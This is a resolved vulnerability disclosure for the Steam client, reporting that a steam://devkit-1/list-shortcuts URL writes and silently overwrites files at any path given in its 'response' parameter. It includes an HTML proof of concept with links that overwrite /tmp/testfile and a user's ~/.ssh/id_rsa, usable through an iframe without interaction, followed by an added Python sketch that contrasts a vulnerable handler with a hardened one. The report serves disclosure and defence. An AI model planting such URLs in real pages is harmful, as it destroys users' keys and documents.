[steam client] Opening a specific steam:// url overwrites files at an arbitrary location
## Team Summary

Official summary from Valve
If a user opens `steam://devkit-1/list-shortcuts?response=/tmp/testfile`, a file `/tmp/testfile` will be created containing the response to this request. Another problem is that the file will be *overwritten* if it already exists. The owner of the file will be the same as the user that runs the Steam client. This also means that we can overwrite and wipe out files that the user cares about, e.g. SSH keys, documents, etc., as long as we know the full path to those files.

POC (the URL may also be visited with an iframe and thus doesn't require any user interaction):

```html
<html>
  <head>
    <title>Steam client POC</title>
  </head>
  <body>
    <a href="steam://devkit-1/list-shortcuts?response=/tmp/testfile">Create /tmp/testfile</a>
    <a href="steam://devkit-1/list-shortcuts?response=/home/ubuntu/.ssh/id_rsa">Overwrite /home/ubuntu/.ssh/id_rsa</a>
  </body>
</html>
```

## Impact

An attacker can overwrite and wipe out files at an arbitrary location, as long as the Steam client is executed as a user that can write to those files. A user's SSH keys, documents, etc. may be deleted as long as the attacker knows the full path to those files.
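The root cause described above is a classic write-what-where through a URL handler: the `response` query parameter is taken as a filesystem path and written to with overwrite semantics. The following is an added example, not Steam's code and not Valve's fix. It models a hypothetical `steam://` handler in two forms: `handle_vulnerable` reproduces the reported behaviour (arbitrary path, silent truncation of an existing file), and `handle_hardened` shows the two properties a defender wants instead, confinement of the output to a fixed directory and refusal to clobber an existing file using `O_CREAT | O_EXCL`. The function names, the output directory and the sample payloads are all constructed for the example.

```python
"""Added example (hypothetical, not Steam's code): a steam://-style URL handler
that writes a response file, in a vulnerable and a hardened variant."""
import os
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, urlparse


def parse_devkit_request(url: str) -> tuple[str, str, dict[str, str]]:
    """Split steam://<host>/<path>?<query> into host, path and a query map.
    For the URL from the report: ('devkit-1', 'list-shortcuts', {'response': '/tmp/testfile'})."""
    u = urlparse(url)
    if u.scheme != "steam":
        raise ValueError("not a steam:// URL")
    query = {k: v[0] for k, v in parse_qs(u.query).items()}
    return u.netloc, u.path.lstrip("/"), query


def handle_vulnerable(url: str, payload: bytes) -> Path:
    """Models the reported behaviour: the `response` value is used verbatim as the
    output path. Any path the Steam user can write to is accepted, and an
    existing file is silently truncated and replaced."""
    _, _, query = parse_devkit_request(url)
    target = Path(query["response"])
    target.write_bytes(payload)  # arbitrary location, overwrite allowed
    return target


def handle_hardened(url: str, payload: bytes, outdir: Path) -> Path:
    """Hardened variant (a generic mitigation, not Valve's actual fix):
    - the URL may only choose a plain file *name*, never a path;
    - the file is confined to `outdir` (checked after resolving symlinks);
    - O_CREAT|O_EXCL creates the file atomically and fails if it already exists,
      so user data is never overwritten and a create/check race is not possible."""
    _, _, query = parse_devkit_request(url)
    name = query.get("response", "")
    if not name or name != os.path.basename(name) or name.startswith("."):
        raise ValueError("response must be a plain, non-hidden file name")
    outdir = outdir.resolve()
    target = (outdir / name).resolve()
    if target.parent != outdir:
        raise ValueError("response path escapes the output directory")
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(payload)
    return target


def demo() -> dict[str, str]:
    """Run both handlers in a scratch directory and summarise what happened."""
    tmp = Path(tempfile.mkdtemp())
    result = {}

    # Vulnerable handler: a pre-existing file (standing in for ~/.ssh/id_rsa) is wiped.
    victim = tmp / "id_rsa"
    victim.write_bytes(b"-----BEGIN PRIVATE KEY----- (constructed sample)")
    handle_vulnerable(f"steam://devkit-1/list-shortcuts?response={victim}", b"response body")
    result["vulnerable"] = victim.read_bytes().decode()

    # Hardened handler: confined to outdir, and a second write to the same name is refused.
    outdir = tmp / "devkit-responses"
    outdir.mkdir()
    handle_hardened("steam://devkit-1/list-shortcuts?response=shortcuts.json", b"ok", outdir)
    try:
        handle_hardened("steam://devkit-1/list-shortcuts?response=shortcuts.json", b"again", outdir)
        result["hardened_second_write"] = "overwrote"
    except FileExistsError:
        result["hardened_second_write"] = "refused"
    try:
        handle_hardened(f"steam://devkit-1/list-shortcuts?response={victim}", b"x", outdir)
        result["hardened_abs_path"] = "accepted"
    except ValueError:
        result["hardened_abs_path"] = "rejected"
    return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The name check (`name == basename(name)` plus no leading dot) is deliberately strict: it rejects absolute paths, `..` components, trailing slashes and dotfiles in one step, and the post-`resolve()` parent comparison catches anything that still escapes through a symlink in `outdir`. `O_EXCL` is what actually prevents the "overwrite and wipe out" outcome from the report; a mere existence check before opening would leave a race window.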
## Report Details

Additional information and metadata

- State: Closed
- Substate: Resolved
- Bounty: $750.00
- Submitted:
- Weakness: Write-what-where Condition